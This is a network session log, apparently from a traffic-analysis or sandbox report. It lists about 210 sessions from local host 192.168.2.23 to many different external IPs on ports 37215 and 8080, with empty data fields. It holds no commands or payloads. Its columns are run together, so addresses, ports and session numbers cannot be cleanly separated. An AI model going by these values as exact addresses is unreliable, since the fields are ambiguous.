                                                        19089192.168.2.233938041.81.235.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19090192.168.2.2357718157.46.187.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19091192.168.2.2335794138.180.199.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19092192.168.2.2347592197.59.138.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19093192.168.2.2350512197.116.170.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19094192.168.2.233300041.67.2.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19095192.168.2.234457441.97.59.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19096192.168.2.2359874157.188.189.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19097192.168.2.2356846157.184.120.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19098192.168.2.233511441.176.151.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19099192.168.2.235019838.202.2.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19100192.168.2.233442241.98.86.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19101192.168.2.2350498197.78.237.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19102192.168.2.2345508157.145.249.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19103192.168.2.235311641.138.30.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19104192.168.2.2343498197.147.117.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19105192.168.2.2345446142.50.251.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19106192.168.2.2339626197.175.158.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19107192.168.2.2338796157.1.52.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19108192.168.2.2360680157.110.242.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19109192.168.2.2359586197.14.218.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19110192.168.2.2349640186.235.231.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19111192.168.2.2342298197.135.171.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19112192.168.2.2341694197.20.175.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19113192.168.2.234281041.227.163.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19114192.168.2.2344674157.39.90.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19115192.168.2.23356689.37.184.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19116192.168.2.234600841.92.79.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19117192.168.2.235516041.99.72.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19118192.168.2.2343452197.135.145.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19119192.168.2.235719641.184.175.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19120192.168.2.234697641.59.204.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19121192.168.2.2333574197.69.159.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19122192.168.2.2344696157.68.224.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19123192.168.2.2337712157.22.192.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19124192.168.2.235009241.109.130.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19125192.168.2.233759041.166.163.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19126192.168.2.233798041.198.163.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19127192.168.2.2346880197.25.23.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19128192.168.2.2355216157.72.223.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19129192.168.2.2341864122.124.79.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19130192.168.2.2336502157.11.181.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19131192.168.2.2333310142.88.137.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19132192.168.2.235962441.158.141.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19133192.168.2.234069841.120.186.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19134192.168.2.2339388177.200.139.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19135192.168.2.2354914157.26.228.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19136192.168.2.2341480157.182.181.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19137192.168.2.2341490157.177.244.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19138192.168.2.234064441.47.117.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19139192.168.2.2347754197.189.107.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19140192.168.2.2358664222.188.30.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19141192.168.2.2333412157.175.54.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19142192.168.2.2347454191.203.17.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19143192.168.2.2342082157.11.7.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19144192.168.2.233526041.120.194.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19145192.168.2.2360104197.216.199.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19146192.168.2.233347254.242.209.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19147192.168.2.23421561.182.243.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19148192.168.2.2344096197.40.226.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19149192.168.2.2356804157.235.110.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19150192.168.2.233596896.147.148.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19151192.168.2.2347830197.124.141.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19152192.168.2.2346326171.237.126.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19153192.168.2.2344416157.2.47.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19154192.168.2.2336094157.89.203.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19155192.168.2.2339362197.1.40.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19156192.168.2.2348090119.96.40.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19157192.168.2.234326474.190.175.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19158192.168.2.2356386157.16.63.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19159192.168.2.2353608197.8.142.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19160192.168.2.2348500197.163.30.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19161192.168.2.2342472157.7.131.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19162192.168.2.2343962180.83.230.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19163192.168.2.233719641.167.165.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19164192.168.2.235194841.166.84.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19165192.168.2.233988841.255.177.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19166192.168.2.235406638.230.156.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19167192.168.2.2340470197.183.88.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19168192.168.2.2333730117.6.178.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19169192.168.2.235878241.3.30.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19170192.168.2.235356861.167.178.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19171192.168.2.2337438197.149.19.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19172192.168.2.2339600197.198.166.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19173192.168.2.2358472197.98.6.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19174192.168.2.233838835.171.95.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19175192.168.2.2356286149.1.84.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19176192.168.2.233344824.115.68.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19177192.168.2.2347772185.98.43.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19178192.168.2.2334820203.79.231.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19179192.168.2.235905251.148.60.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19180192.168.2.2334118197.254.236.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19181192.168.2.235060641.111.156.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19182192.168.2.234517266.172.61.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19183192.168.2.2351968157.28.162.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19184192.168.2.2341818136.217.44.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19185192.168.2.2335428157.127.22.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19186192.168.2.2346830197.94.210.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19187192.168.2.2350018157.238.85.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19188192.168.2.2344736208.83.142.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19189192.168.2.2339712157.111.117.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19190192.168.2.235192640.152.222.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19191192.168.2.2349474157.255.47.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192192.168.2.234900041.178.192.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19193192.168.2.234287441.41.62.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19194192.168.2.2347066157.60.108.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19195192.168.2.2342480157.137.92.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19196192.168.2.2342070203.218.122.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19197192.168.2.2355784115.181.252.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19198192.168.2.2358154176.49.104.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19199192.168.2.2354358197.203.13.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19200192.168.2.235137041.101.5.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19201192.168.2.2355254197.143.24.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19202192.168.2.234080641.92.140.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19203192.168.2.2341412157.139.220.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19204192.168.2.233310876.252.127.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19205192.168.2.2341198157.237.227.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19206192.168.2.235162080.66.65.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19207192.168.2.2359970163.232.13.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19208192.168.2.2341508176.109.251.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19209192.168.2.2337748197.192.164.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19210192.168.2.234488441.212.81.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19211192.168.2.2339350157.124.116.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19212192.168.2.2351710157.249.45.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19213192.168.2.2352738197.214.207.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19214192.168.2.2360304114.141.38.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19215192.168.2.2359322197.203.93.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19216192.168.2.2344458197.119.66.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19217192.168.2.2348174157.103.103.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19218192.168.2.2340768157.180.90.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19219192.168.2.233850813.155.142.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19220192.168.2.233565241.70.69.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19221192.168.2.2337760197.210.162.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19222192.168.2.2334202197.57.218.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19223192.168.2.233454241.147.60.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19224192.168.2.2348818157.220.202.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19225192.168.2.2338282178.108.53.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19226192.168.2.2356940197.78.243.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19227192.168.2.2346738167.252.88.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19228192.168.2.2340992197.149.133.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19229192.168.2.234557059.203.4.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19230192.168.2.235265065.138.20.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19231192.168.2.2338086197.66.88.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19232192.168.2.234871041.125.71.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19233192.168.2.2334852111.42.101.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19234192.168.2.2340358197.50.164.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19235192.168.2.2358960157.144.181.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19236192.168.2.235877641.65.252.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19237192.168.2.2351724220.73.4.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19238192.168.2.2336056197.52.92.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19239192.168.2.2335964157.89.104.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19240192.168.2.2352440197.113.216.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19241192.168.2.234039851.166.198.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19242192.168.2.2343800157.28.94.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19243192.168.2.2347466197.218.250.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19244192.168.2.2341604197.12.155.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19245192.168.2.2333800157.123.118.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19246192.168.2.2360992157.186.210.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19247192.168.2.2356928197.8.117.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19248192.168.2.2336162165.102.59.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19249192.168.2.233595441.65.186.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19250192.168.2.2350634208.189.65.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19251192.168.2.2344834153.53.2.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19252192.168.2.2356764116.30.212.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19253192.168.2.235937251.123.160.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19254192.168.2.2353502151.160.166.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19255192.168.2.234952675.72.148.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19256192.168.2.235882688.187.232.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19257192.168.2.2346452158.192.27.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19258192.168.2.2350978116.104.192.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19259192.168.2.235093239.174.14.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19260192.168.2.2351084192.232.177.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19261192.168.2.2334868181.93.11.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19262192.168.2.2341246169.99.167.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19263192.168.2.2335820149.212.7.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19264192.168.2.235284240.187.71.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19265192.168.2.2345268107.128.218.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19266192.168.2.2356968212.14.98.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19267192.168.2.2345108204.170.76.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19268192.168.2.23393042.133.41.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19269192.168.2.2342760110.53.29.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19270192.168.2.234246653.102.41.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19271192.168.2.2358362191.195.101.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19272192.168.2.2358324107.20.32.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19273192.168.2.2355368149.230.229.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19274192.168.2.235237848.64.13.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19275192.168.2.235688636.109.80.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19276192.168.2.2359588219.164.211.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19277192.168.2.2357062211.44.246.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19278192.168.2.233494480.233.222.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19279192.168.2.2352260152.195.119.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19280192.168.2.2343842111.255.233.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19281192.168.2.2333738179.250.93.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19282192.168.2.234808246.14.47.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19283192.168.2.2355794187.215.17.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19284192.168.2.234249462.98.148.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19285192.168.2.2334582172.52.87.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19286192.168.2.2350282218.185.248.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19287192.168.2.236056262.108.0.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19288192.168.2.235393679.10.114.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19289192.168.2.234292245.71.129.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19290192.168.2.235792644.124.31.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19291192.168.2.2342950193.60.141.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19292192.168.2.2340336147.221.149.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19293192.168.2.2336594105.159.118.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19294192.168.2.2358232129.92.44.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19295192.168.2.2342758180.235.184.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19296192.168.2.2359602143.72.130.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19297192.168.2.235209088.56.102.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19298192.168.2.2337092143.227.211.1798080
                                                        TimestampBytes transferredDirectionData


